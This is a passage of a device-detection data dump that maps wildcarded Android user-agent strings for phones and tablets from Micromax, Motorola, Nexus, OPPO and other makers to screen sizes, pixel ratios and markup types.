Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q380) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q381) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q382) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q383) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q391) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q392) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q415) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q417) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q424) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q461) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q462) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q465) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MotoE2(4G-LTE)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MotoE2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MotoG3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MyWigo City2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; N501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; N6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; N8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; N8503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NB105) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NB106) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NB85) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NET K5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NOA_MOVEse) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NOA_VIVOse) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NOBLEX N451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NOS FIVE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NP601SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NS 5511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NS3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NS6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NUU_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX505J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX511J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX512J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX521J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX523J_V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX529J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX535J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NX541J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; NYX_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Neffos C5 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Neffos C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nexus 9) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nomi i451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nomi i504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nomi i507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nomi i552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Nura 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; O6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OBI MV1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OK-LM2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OK-LS1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OK-LS2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ONE A2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ONE E1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO A37m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO A59m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO A59s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO F1s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO R7sm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO R9m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OPPO R9tm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; OUKITEL U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Odyssey S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Orange Dive 30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Outdoor LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P01T_1) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P01Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P01Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P021) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P023) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P30 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P35 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 